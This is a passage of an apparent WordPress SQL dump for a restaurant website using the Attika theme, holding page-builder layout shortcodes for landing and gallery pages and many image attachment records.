custom_link=\"http://attika.mikado-themes.com\"][vc_empty_space height=\"55px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 32% 0 2%\" item_padding_1367_1600=\"0 23% 0 3%\" item_padding_1025_1366=\"0 20% 0 3%\" item_padding_769_1024=\"0 20% 0 3%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" title_tag=\"\" image=\"2978\" image_size=\"full\" title=\"Restaurant Home\" title_top_margin=\"22\" custom_link=\"http://attika.mikado-themes.com/restaurant-home/\"][vc_empty_space height=\"55px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 2% 0 32%\" item_padding_1367_1600=\"0 3% 0 23%\" item_padding_1025_1366=\"0 3% 0 20%\" item_padding_769_1024=\"0 3% 0 20%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" title_tag=\"\" image=\"2948\" image_size=\"full\" title=\"Fine Dining\" title_top_margin=\"22\" custom_link=\"http://attika.mikado-themes.com/fine-dining\"][vc_empty_space height=\"55px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 32% 0 2%\" item_padding_1367_1600=\"0 23% 0 3%\" item_padding_1025_1366=\"0 20% 0 3%\" item_padding_769_1024=\"0 20% 0 3%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" title_tag=\"\" image=\"2764\" image_size=\"full\" title=\"Dish Showcase\" title_top_margin=\"22\" custom_link=\"http://attika.mikado-themes.com/dish-showcase\"][vc_empty_space height=\"55px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 2% 0 32%\" item_padding_1367_1600=\"0 3% 0 23%\" item_padding_1025_1366=\"0 3% 0 20%\" item_padding_769_1024=\"0 3% 0 20%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" title_tag=\"\" image=\"2765\" image_size=\"full\" title=\"Fullscreen Showcase\" title_top_margin=\"22\" custom_link=\"http://attika.mikado-themes.com/fullscreen-showcase\"][vc_empty_space height=\"55px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 32% 0 2%\" item_padding_1367_1600=\"0 23% 0 3%\" item_padding_1025_1366=\"0 20% 0 3%\" item_padding_769_1024=\"0 20% 0 3%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" title_tag=\"\" image=\"2761\" image_size=\"full\" title=\"Seafood Restaurant\" title_top_margin=\"22\" custom_link=\"http://attika.mikado-themes.com/seafood-restaurant\"][vc_empty_space height=\"55px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 2% 0 32%\" item_padding_1367_1600=\"0 3% 0 23%\" item_padding_1025_1366=\"0 3% 0 20%\" item_padding_769_1024=\"0 3% 0 20%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" title_tag=\"\" image=\"2949\" image_size=\"full\" title=\"Restaurant Menu\" title_top_margin=\"22\" custom_link=\"http://attika.mikado-themes.com/restaurant-menu\"][vc_empty_space height=\"55px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 32% 0 2%\" item_padding_1367_1600=\"0 23% 0 3%\" item_padding_1025_1366=\"0 20% 0 3%\" item_padding_769_1024=\"0 20% 0 3%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" title_tag=\"\" image=\"2766\" image_size=\"full\" title=\"Columns Carousel\" title_top_margin=\"22\" custom_link=\"http://attika.mikado-themes.com/columns-carousel\"][vc_empty_space height=\"55px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" css=\".vc_custom_1535967241855{padding-top: 50px !important;padding-bottom: 95px !important;}\"][vc_column][mkdf_section_title type=\"standard\" position=\"\" line_margin=\"0 50% 0\" line_length=\"120px\" text_margin=\"0\"][/mkdf_section_title][vc_column_text css=\".vc_custom_1536937014058{margin-top: -15px !important;}\"]\n<h5>Delicious Predesigned Inner Pages</h5>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 14%\" item_padding_1367_1600=\"0 0 0 14%\" item_padding_1025_1366=\"0 0 0 14%\" item_padding_769_1024=\"0 0 0 10%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2779\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/accolades/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 7% 0\" item_padding_1367_1600=\"0 7% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 5.5% 0\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2776\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/visit-us/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 14% 0 0\" item_padding_1367_1600=\"0 14% 0 0\" item_padding_1025_1366=\"0 14% 0 0\" item_padding_769_1024=\"0 10% 0 0\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2778\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/restaurant-menu-left/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 14%\" item_padding_1367_1600=\"0 0 0 14%\" item_padding_1025_1366=\"0 0 0 14%\" item_padding_769_1024=\"0 0 0 10%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2772\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/chef-bio/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 7% 0\" item_padding_1367_1600=\"0 7% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 5.5% 0\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2775\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/contact-us/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 14% 0 0\" item_padding_1367_1600=\"0 14% 0 0\" item_padding_1025_1366=\"0 14% 0 0\" item_padding_769_1024=\"0 10% 0 0\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2774\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/our-kitchen/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 14%\" item_padding_1367_1600=\"0 0 0 14%\" item_padding_1025_1366=\"0 0 0 14%\" item_padding_769_1024=\"0 0 0 10%\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2773\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/restaurant-history/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 7% 0\" item_padding_1367_1600=\"0 7% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 5.5% 0\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2771\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/opening-hours/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"0 14% 0 0\" item_padding_1367_1600=\"0 14% 0 0\" item_padding_1025_1366=\"0 14% 0 0\" item_padding_769_1024=\"0 10% 0 0\" item_padding_681_768=\"0 15% 0\" item_padding_680=\"0 4% 0\"][mkdf_image_with_text enable_image_shadow=\"yes\" image_behavior=\"custom-link\" custom_link_target=\"_blank\" text_alignment=\"center\" image=\"2777\" image_size=\"full\" custom_link=\"http://attika.mikado-themes.com/restaurant-menu-right/\"][vc_empty_space height=\"15px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row el_class=\"mkdf-landing-bottom-section\"][vc_column][vc_row_inner row_content_width=\"grid\" css=\".vc_custom_1537367428822{padding-top: 21% !important;padding-bottom: 18% !important;}\"][vc_column_inner width=\"1/2\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 18% 0 23%\" item_padding_1367_1600=\"0 18% 0 23%\" item_padding_1025_1366=\"0 10% 0 26%\" item_padding_769_1024=\"0 0 0 18%\" item_padding_681_768=\"0 0 0 14%\" item_padding_680=\"0 0% 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" title=\"Build an unparalleled restaurant website with Attika.\" title_break_words=\"2,3,4,5,6,7\" line_length=\"0px\"][/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"5% 0 0 0\"][mkdf_button type=\"simple\" size=\"large\" text=\"Get Attika\" target=\"_blank\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 0\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner width=\"1/2\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"2620\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Landing Pop Up','','publish','closed','closed','','landing-pop-up','','','2018-08-30 14:09:36','2018-08-30 14:09:36','',0,'http://attika.mikado-themes.com/?page_id=2542',0,'page','',0),(2779,1,'2018-09-05 08:44:30','2018-09-05 08:44:30','','landing-img-18','','inherit','open','closed','','landing-img-18','','','2018-09-05 08:44:30','2018-09-05 08:44:30','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-18.jpg',0,'attachment','image/jpeg',0),(2914,1,'2018-09-17 08:51:35','2018-09-17 08:51:35','','h2-rev-3','','inherit','open','closed','','h2-rev-3-2','','','2018-09-17 08:51:35','2018-09-17 08:51:35','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h2-rev-3.png',0,'attachment','image/png',0),(2564,1,'2018-09-03 08:01:20','2018-09-03 08:01:20','','h4-rev-img-1b','','inherit','open','closed','','h4-rev-img-1b-2','','','2018-09-03 08:01:20','2018-09-03 08:01:20','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h4-rev-img-1b-1.jpg',0,'attachment','image/jpeg',0),(2713,1,'2018-09-04 08:58:11','2018-09-04 08:58:11','','landing-vector-img-2','','inherit','open','closed','','landing-vector-img-2','','','2018-09-04 08:58:11','2018-09-04 08:58:11','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-2.png',0,'attachment','image/png',0),(2776,1,'2018-09-05 08:44:16','2018-09-05 08:44:16','','landing-img-15','','inherit','open','closed','','landing-img-15','','','2018-09-05 08:44:16','2018-09-05 08:44:16','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-15.jpg',0,'attachment','image/jpeg',0),(2625,1,'2018-09-03 10:37:04','2018-09-03 10:37:04','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"three\" space_between_items=\"normal\" number_of_items=\"9\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" title_tag=\"h5\" category=\"kitchen\"][/vc_column][/vc_row]','Standard','','publish','closed','closed','','standard','','','2018-09-03 10:37:04','2018-09-03 10:37:04','',3061,'http://attika.mikado-themes.com/?page_id=2625',0,'page','',0),(2627,1,'2018-09-03 10:37:33','2018-09-03 10:37:33','<p>[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"three\" space_between_items=\"normal\" number_of_items=\"9\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" category=\"kitchen\"][/vc_column][/vc_row][vc_row][vc_column][mkdf_image_gallery type=\"masonry\" enable_image_shadow=\"yes\" image_behavior=\"lightbox\" number_of_columns=\"\" space_between_items=\"huge\" images=\"1202,1201,1200,1182,1181,1180,1179,1178,1177,1176,1174\"][/vc_column][/vc_row]</p>\r\n','Gallery','','publish','closed','closed','','gallery','','','2020-12-06 12:18:24','2020-12-06 11:18:24','',3061,'http://attika.mikado-themes.com/?page_id=2627',0,'page','',0),(2646,1,'2018-09-03 11:13:30','2018-09-03 11:13:30','[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"rand\" order=\"ASC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" filter=\"yes\" category=\"gourmet\"][/vc_column][/vc_row]','Portfolio With Filter','','publish','closed','closed','','portfolio-with-filter','','','2018-09-03 11:13:30','2018-09-03 11:13:30','',3061,'http://attika.mikado-themes.com/?page_id=2646',0,'page','',0),(2652,1,'2018-09-03 11:29:34','2018-09-03 09:29:34','[vc_row][vc_column][rev_slider_vc alias=\"landing\" enable_paspartu=\"no\"][/vc_column][/vc_row]','Landing','','draft','closed','closed','','landing','','','2020-12-05 17:51:09','2020-12-05 16:51:09','',0,'http://attika.mikado-themes.com/?page_id=2652',0,'page','',0),(2556,1,'2018-09-03 07:45:12','2018-09-03 07:45:12','','landing-pop-up-top-character','','inherit','open','closed','','landing-pop-up-top-character','','','2018-09-03 07:45:12','2018-09-03 07:45:12','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-pop-up-top-character.jpg',0,'attachment','image/jpeg',0),(2757,1,'2018-09-05 08:07:13','2018-09-05 08:07:13','','landing-print-img-5','','inherit','open','closed','','landing-print-img-5','','','2018-09-05 08:07:13','2018-09-05 08:07:13','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-5.jpg',0,'attachment','image/jpeg',0),(2714,1,'2018-09-04 08:58:14','2018-09-04 08:58:14','','landing-vector-img-3','','inherit','open','closed','','landing-vector-img-3','','','2018-09-04 08:58:14','2018-09-04 08:58:14','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-3.jpg',0,'attachment','image/jpeg',0),(2204,1,'2018-08-27 14:10:45','2018-08-27 14:10:45','','h7-port-img-10','','inherit','open','closed','','h7-port-img-10','','','2018-08-27 14:10:45','2018-08-27 14:10:45','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-10.jpg',0,'attachment','image/jpeg',0),(2777,1,'2018-09-05 08:44:19','2018-09-05 08:44:19','','landing-img-16','','inherit','open','closed','','landing-img-16','','','2018-09-05 08:44:19','2018-09-05 08:44:19','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-16.jpg',0,'attachment','image/jpeg',0),(2865,1,'2018-09-14 09:47:45','2018-09-14 09:47:45','','h5-rev-img-2b','','inherit','open','closed','','h5-rev-img-2b','','','2018-09-14 09:47:45','2018-09-14 09:47:45','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h5-rev-img-2b.jpg',0,'attachment','image/jpeg',0),(2720,1,'2018-09-04 11:45:20','2018-09-04 11:45:20','','h4-img-1','','inherit','open','closed','','h4-img-1-2','','','2018-09-04 11:45:20','2018-09-04 11:45:20','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-1-1.jpg',0,'attachment','image/jpeg',0),(2758,1,'2018-09-05 08:07:19','2018-09-05 08:07:19','','landing-vector-img-9','','inherit','open','closed','','landing-vector-img-9','','','2018-09-05 08:07:19','2018-09-05 08:07:19','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-9.png',0,'attachment','image/png',0),(2562,1,'2018-09-03 07:50:15','2018-09-03 07:50:15','','h4-rev-img-1b','','inherit','open','closed','','h4-rev-img-1b','','','2018-09-03 07:50:15','2018-09-03 07:50:15','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h4-rev-img-1b.jpg',0,'attachment','image/jpeg',0),(2778,1,'2018-09-05 08:44:21','2018-09-05 08:44:21','','landing-img-17','','inherit','open','closed','','landing-img-17','','','2018-09-05 08:44:21','2018-09-05 08:44:21','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-17.jpg',0,'attachment','image/jpeg',0),(2222,1,'2018-08-27 15:14:42','2018-08-27 15:14:42','','kitchen-img-gallery-3','','inherit','open','closed','','kitchen-img-gallery-3','','','2018-08-27 15:14:42','2018-08-27 15:14:42','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-img-gallery-3.jpg',0,'attachment','image/jpeg',0),(2910,1,'2018-09-17 08:44:27','2018-09-17 08:44:27','','h1-img-1','','inherit','open','closed','','h1-img-1-2','','','2018-09-17 08:44:27','2018-09-17 08:44:27','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h1-img-1.png',0,'attachment','image/png',0),(2761,1,'2018-09-05 08:07:58','2018-09-05 08:07:58','','landing-img-3','','inherit','open','closed','','landing-img-3','','','2018-09-05 08:07:58','2018-09-05 08:07:58','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-3.jpg',0,'attachment','image/jpeg',0),(2721,1,'2018-09-04 11:45:25','2018-09-04 11:45:25','','h4-img-2','','inherit','open','closed','','h4-img-2-2','','','2018-09-04 11:45:25','2018-09-04 11:45:25','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-img-2-1.jpg',0,'attachment','image/jpeg',0),(2051,1,'2018-08-23 13:56:11','2018-08-23 13:56:11','','h3-rev-img-2','','inherit','open','closed','','h3-rev-img-2','','','2018-08-23 13:56:11','2018-08-23 13:56:11','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-rev-img-2.png',0,'attachment','image/png',0),(2052,1,'2018-08-23 13:56:14','2018-08-23 13:56:14','','h3-rev-img-3','','inherit','open','closed','','h3-rev-img-3','','','2018-08-23 13:56:14','2018-08-23 13:56:14','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-rev-img-3.png',0,'attachment','image/png',0),(2352,1,'2018-08-29 08:19:53','2018-08-29 08:19:53','','h7-port-img-12','','inherit','open','closed','','h7-port-img-12','','','2018-08-29 08:19:53','2018-08-29 08:19:53','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-12.jpg',0,'attachment','image/jpeg',0),(2657,1,'2018-09-03 12:03:02','2018-09-03 12:03:02','','landing-first-backround','','inherit','open','closed','','landing-first-backround','','','2018-09-03 12:03:02','2018-09-03 12:03:02','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-first-backround.jpg',0,'attachment','image/jpeg',0),(2053,1,'2018-08-23 13:56:16','2018-08-23 13:56:16','','h3-rev-img-4','','inherit','open','closed','','h3-rev-img-4','','','2018-08-23 13:56:16','2018-08-23 13:56:16','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-rev-img-4.png',0,'attachment','image/png',0),(2772,1,'2018-09-05 08:44:06','2018-09-05 08:44:06','','landing-img-11','','inherit','open','closed','','landing-img-11','','','2018-09-05 08:44:06','2018-09-05 08:44:06','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-11.jpg',0,'attachment','image/jpeg',0),(2750,1,'2018-09-04 14:44:22','2018-09-04 14:44:22','','landing-vector-img-6','','inherit','open','closed','','landing-vector-img-6','','','2018-09-04 14:44:22','2018-09-04 14:44:22','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-6.png',0,'attachment','image/png',0),(2120,1,'2018-08-24 13:06:21','2018-08-24 13:06:21','','opening-hours-single-img','','inherit','open','closed','','opening-hours-single-img','','','2018-08-24 13:06:21','2018-08-24 13:06:21','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/opening-hours-single-img.jpg',0,'attachment','image/jpeg',0),(2786,1,'2018-09-05 09:37:52','2018-09-05 09:37:52','','landing-vector-img-15','','inherit','open','closed','','landing-vector-img-15','','','2018-09-05 09:37:52','2018-09-05 09:37:52','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-15.png',0,'attachment','image/png',0),(2353,1,'2018-08-29 08:21:31','2018-08-29 08:21:31','','h7-port-img-9','','inherit','open','closed','','h7-port-img-9-2','','','2018-08-29 08:21:31','2018-08-29 08:21:31','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-9-1.jpg',0,'attachment','image/jpeg',0),(2664,1,'2018-09-03 12:13:28','2018-09-03 12:13:28','','landing-first-character','','inherit','open','closed','','landing-first-character','','','2018-09-03 12:13:28','2018-09-03 12:13:28','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-first-character.png',0,'attachment','image/png',0),(2135,1,'2018-08-24 14:00:26','2018-08-24 14:00:26','','h1-img-13','','inherit','open','closed','','h1-img-13','','','2018-08-24 14:00:26','2018-08-24 14:00:26','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-13.jpg',0,'attachment','image/jpeg',0),(2773,1,'2018-09-05 08:44:09','2018-09-05 08:44:09','','landing-img-12','','inherit','open','closed','','landing-img-12','','','2018-09-05 08:44:09','2018-09-05 08:44:09','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-12.jpg',0,'attachment','image/jpeg',0),(2794,1,'2018-09-10 08:26:23','2018-09-10 08:26:23','','landing-pop-up-opener-top','','inherit','open','closed','','landing-pop-up-opener-top','','','2018-09-10 08:26:23','2018-09-10 08:26:23','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-pop-up-opener-top.png',0,'attachment','image/png',0),(2164,1,'2018-08-27 09:38:09','2018-08-27 09:38:09','','Sequence #1','','inherit','open','closed','','sequence-1','','','2018-08-27 09:38:09','2018-08-27 09:38:09','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/Sequence-1.mp4',0,'attachment','video/mp4',0),(2665,1,'2018-09-03 12:31:32','2018-09-03 12:31:32','','landing-first-rectangle','','inherit','open','closed','','landing-first-rectangle','','','2018-09-03 12:31:32','2018-09-03 12:31:32','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-first-rectangle.jpg',0,'attachment','image/jpeg',0),(2754,1,'2018-09-04 15:13:32','2018-09-04 15:13:32','','landing-print-img-4','','inherit','open','closed','','landing-print-img-4','','','2018-09-04 15:13:32','2018-09-04 15:13:32','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-4.jpg',0,'attachment','image/jpeg',0),(2803,1,'2018-09-13 13:39:10','2018-09-13 13:39:10','','favicon','','inherit','open','closed','','icon_final_512x512','','','2018-09-13 13:39:10','2018-09-13 13:39:10','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/icon_final_512x512.png',0,'attachment','image/png',0),(2774,1,'2018-09-05 08:44:11','2018-09-05 08:44:11','','landing-img-13','','inherit','open','closed','','landing-img-13','','','2018-09-05 08:44:11','2018-09-05 08:44:11','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-13.jpg',0,'attachment','image/jpeg',0),(2200,1,'2018-08-27 13:04:53','2018-08-27 13:04:53','','h5-img-14a','','inherit','open','closed','','h5-img-14a','','','2018-08-27 13:04:53','2018-08-27 13:04:53','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-14a.jpg',0,'attachment','image/jpeg',0),(2695,1,'2018-09-03 15:26:04','2018-09-03 15:26:04','','landing-scrool','','inherit','open','closed','','landing-scrool','','','2018-09-03 15:26:04','2018-09-03 15:26:04','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-scrool.jpg',0,'attachment','image/jpeg',0),(2487,1,'2018-08-30 10:17:18','2018-08-30 10:17:18','','h3-team-member-img-1','','inherit','open','closed','','h3-team-member-img-1','','','2018-08-30 10:17:18','2018-08-30 10:17:18','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-team-member-img-1.jpg',0,'attachment','image/jpeg',0),(2804,1,'2018-09-13 13:39:25','2018-09-13 13:39:25','https://www.ristorantesolymar.it/wp-content/uploads/2018/09/cropped-icon_final_512x512.png','cropped-icon_final_512x512.png','','inherit','open','closed','','cropped-icon_final_512x512-png','','','2018-09-13 13:39:25','2018-09-13 13:39:25','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/cropped-icon_final_512x512.png',0,'attachment','image/png',0),(2202,1,'2018-08-27 14:10:38','2018-08-27 14:10:38','','h7-port-img-8','','inherit','open','closed','','h7-port-img-8','','','2018-08-27 14:10:38','2018-08-27 14:10:38','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-8.jpg',0,'attachment','image/jpeg',0),(2755,1,'2018-09-04 15:16:01','2018-09-04 15:16:01','','landing-vector-img-7','','inherit','open','closed','','landing-vector-img-7','','','2018-09-04 15:16:01','2018-09-04 15:16:01','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-7.jpg',0,'attachment','image/jpeg',0),(2488,1,'2018-08-30 10:17:20','2018-08-30 10:17:20','','h3-team-member-img-2','','inherit','open','closed','','h3-team-member-img-2','','','2018-08-30 10:17:20','2018-08-30 10:17:20','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-team-member-img-2.jpg',0,'attachment','image/jpeg',0),(2712,1,'2018-09-04 08:58:08','2018-09-04 08:58:08','','landing-vector-img-1','','inherit','open','closed','','landing-vector-img-1','','','2018-09-04 08:58:08','2018-09-04 08:58:08','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-1.png',0,'attachment','image/png',0),(2775,1,'2018-09-05 08:44:14','2018-09-05 08:44:14','','landing-img-14','','inherit','open','closed','','landing-img-14','','','2018-09-05 08:44:14','2018-09-05 08:44:14','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-14.jpg',0,'attachment','image/jpeg',0),(2805,1,'2020-12-05 17:05:41','2020-12-05 16:05:41','{{unknown}}','','','publish','closed','closed','','323735d1bac80dee2d635e68a03415e3','','','2020-12-05 17:05:41','2020-12-05 16:05:41','',0,'https://www.ristorantesolymar.it/2020/12/05/323735d1bac80dee2d635e68a03415e3/',0,'oembed_cache','',0),(2843,1,'2018-09-14 09:09:13','2018-09-14 09:09:13','<p>[vc_row][vc_column][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"five\" space_between_items=\"normal\" number_of_items=\"10\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"DESC\" item_style=\"gallery-overlay\" title_tag=\"h5\" 